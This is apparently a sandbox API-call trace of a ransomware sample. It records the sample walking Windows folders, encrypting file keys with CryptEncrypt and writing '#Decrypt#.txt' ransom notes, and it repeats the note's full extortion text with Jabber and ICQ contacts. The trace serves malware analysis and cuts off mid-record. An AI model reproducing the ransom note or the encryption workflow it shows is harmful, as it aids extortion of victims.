horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0223.921] WriteFile (in: hFile=0x200, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af578, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af578*=0x5e4, lpOverlapped=0x0) returned 1 [0223.923] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0223.923] WriteFile (in: hFile=0x200, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af578, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af578*=0x558, lpOverlapped=0x0) returned 1 [0223.923] CloseHandle (hObject=0x200) returned 1 [0223.923] 
GetProcessHeap () returned 0x780000 [0223.923] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7b67f0 | out: hHeap=0x780000) returned 1 [0223.923] FindNextFileW (in: hFindFile=0x7c66a0, lpFindFileData=0x32af7f8 | out: lpFindFileData=0x32af7f8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xaece4da0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0223.923] lstrcmpiW (lpString1="pagefile.sys", lpString2="Windows") returned -1 [0223.923] wnsprintfW (in: pszDest=0x7c7d50, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\pagefile.sys") returned 19 [0223.924] StrStrIW (lpFirst="pagefile.sys", lpSrch=".horseleader") returned 0x0 [0223.924] lstrcmpW (lpString1="pagefile.sys", lpString2="#Decrypt#.txt") returned 1 [0223.924] lstrcmpW (lpString1="pagefile.sys", lpString2="_uninstalling_.png") returned 1 [0223.924] lstrlenW (lpString=".testttjffg") returned 11 [0223.924] StrStrW (lpFirst="\\\\?\\C:\\pagefile.sys", lpSrch=".testttjffg") returned 0x0 [0223.924] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af6f0 | out: pbBuffer=0x32af6f0) returned 1 [0223.924] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af6f0*, pdwDataLen=0x32af7ac*=0x24, dwBufLen=0x80 | out: pbData=0x32af6f0*, pdwDataLen=0x32af7ac*=0x80) returned 1 [0223.924] CreateFileW (lpFileName="\\\\?\\C:\\pagefile.sys" (normalized: "c:\\pagefile.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0223.924] FindNextFileW (in: hFindFile=0x7c66a0, lpFindFileData=0x32af7f8 | out: lpFindFileData=0x32af7f8*(dwFileAttributes=0x10, 
ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0223.924] lstrcmpiW (lpString1="PerfLogs", lpString2="Windows") returned -1 [0223.924] wnsprintfW (in: pszDest=0x7c7d50, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs") returned 15 [0223.924] lstrcmpW (lpString1="PerfLogs", lpString2=".") returned 1 [0223.925] lstrcmpW (lpString1="PerfLogs", lpString2="..") returned 1 [0223.925] lstrcmpW (lpString1="\\\\?\\C:\\PerfLogs", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0223.925] GetProcessHeap () returned 0x780000 [0223.925] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7b67f0 [0223.925] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\PerfLogs\\*") returned 17 [0223.925] FindFirstFileW (in: lpFileName="\\\\?\\C:\\PerfLogs\\*", lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName=".", cAlternateFileName="")) returned 0x7c66e0 [0223.925] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0223.925] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\.") returned 17 [0223.925] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0223.925] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: 
lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="..", cAlternateFileName="")) returned 1 [0223.926] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0223.926] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\..") returned 18 [0223.926] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0223.926] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0223.926] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="Admin", cAlternateFileName="")) returned 1 [0223.926] lstrcmpiW (lpString1="Admin", lpString2="Windows") returned -1 [0223.926] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin") returned 21 [0223.926] lstrcmpW (lpString1="Admin", lpString2=".") returned 1 [0223.926] lstrcmpW (lpString1="Admin", lpString2="..") returned 1 [0223.926] lstrcmpW (lpString1="\\\\?\\C:\\PerfLogs\\Admin", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0223.926] GetProcessHeap () returned 0x780000 [0223.926] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0223.926] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: 
pszDest="\\\\?\\C:\\PerfLogs\\Admin\\*") returned 23 [0223.926] FindFirstFileW (in: lpFileName="\\\\?\\C:\\PerfLogs\\Admin\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0223.927] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0223.927] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin\\.") returned 23 [0223.927] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0223.927] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0223.927] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0223.927] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin\\..") returned 24 [0223.927] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0223.927] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0223.927] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, 
ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 0 [0223.927] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0223.927] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin\\#Decrypt#.txt") returned 35 [0223.927] CreateFileW (lpFileName="\\\\?\\C:\\PerfLogs\\Admin\\#Decrypt#.txt" (normalized: "c:\\perflogs\\admin\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0223.929] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0223.929] WriteFile (in: hFile=0x164, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0223.931] lstrlenA (lpString="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") returned 1368 [0223.931] WriteFile (in: hFile=0x164, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0223.931] CloseHandle (hObject=0x164) returned 1 [0223.931] GetProcessHeap () returned 0x780000 [0223.931] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0223.931] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="Admin", cAlternateFileName="")) returned 0 [0223.931] FindClose (in: hFindFile=0x7c66e0 | out: hFindFile=0x7c66e0) returned 1 [0223.931] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\#Decrypt#.txt") returned 29 [0223.931] CreateFileW (lpFileName="\\\\?\\C:\\PerfLogs\\#Decrypt#.txt" (normalized: "c:\\perflogs\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0223.932] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber 
client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0223.932] WriteFile (in: hFile=0x200, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af578, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af578*=0x5e4, lpOverlapped=0x0) returned 1 [0223.940] lstrlenA (lpString="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") returned 1368 [0223.940] WriteFile (in: hFile=0x200, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af578, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af578*=0x558, lpOverlapped=0x0) returned 1 [0223.940] CloseHandle (hObject=0x200) returned 1 [0225.765] GetProcessHeap () returned 0x780000 [0225.765] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7b67f0 | out: hHeap=0x780000) returned 1 [0225.765] FindNextFileW (in: hFindFile=0x7c66a0, lpFindFileData=0x32af7f8 | out: lpFindFileData=0x32af7f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xebaa5200, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xebaa5200, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0225.765] lstrcmpiW (lpString1="Program Files", lpString2="Windows") returned -1 [0225.765] wnsprintfW (in: pszDest=0x7c7d50, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files") returned 20 [0225.766] lstrcmpW (lpString1="Program Files", lpString2=".") returned 1 [0225.766] lstrcmpW (lpString1="Program Files", lpString2="..") returned 1 [0225.766] lstrcmpW (lpString1="\\\\?\\C:\\Program Files", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0225.766] GetProcessHeap () returned 0x780000 [0225.766] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7b67f0 [0225.766] wnsprintfW (in: 
pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\*") returned 22 [0225.766] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\*", lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xebaa5200, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xebaa5200, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName=".", cAlternateFileName="")) returned 0x7c66e0 [0225.766] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0225.766] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\.") returned 22 [0225.766] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0225.766] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0225.767] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0225.767] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0225.767] lstrlenW (lpString=".testttjffg") returned 11 [0225.767] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\.", lpSrch=".testttjffg") returned 0x0 [0225.767] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af478 | out: pbBuffer=0x32af478) returned 1 [0225.767] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af478*, pdwDataLen=0x32af534*=0x24, dwBufLen=0x80 | out: pbData=0x32af478*, pdwDataLen=0x32af534*=0x80) returned 1 [0225.767] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\." 
(normalized: "c:\\program files\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0225.767] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xebaa5200, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xebaa5200, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="..", cAlternateFileName="")) returned 1 [0225.768] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0225.768] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\..") returned 23 [0225.768] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0225.768] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0225.768] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0225.768] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0225.768] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0225.768] lstrlenW (lpString=".testttjffg") returned 11 [0225.768] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\..", lpSrch=".testttjffg") returned 0x0 [0225.768] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af478 | out: pbBuffer=0x32af478) returned 1 [0225.768] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af478*, pdwDataLen=0x32af534*=0x24, dwBufLen=0x80 | out: pbData=0x32af478*, pdwDataLen=0x32af534*=0x80) returned 1 [0225.768] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\.." 
(normalized: "c:"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0225.768] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe389e040, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe389e040, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 1 [0225.768] lstrcmpiW (lpString1="Common Files", lpString2="Windows") returned -1 [0225.768] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files") returned 33 [0225.768] lstrcmpW (lpString1="Common Files", lpString2=".") returned 1 [0225.768] lstrcmpW (lpString1="Common Files", lpString2="..") returned 1 [0225.768] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0225.768] GetProcessHeap () returned 0x780000 [0225.769] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0225.769] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\*") returned 35 [0225.769] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe389e040, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe389e040, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, 
dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0225.769] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0225.769] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\.") returned 35 [0225.769] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0225.769] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe389e040, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe389e040, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0225.769] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0225.769] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\..") returned 36 [0225.769] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0225.769] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0225.769] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, 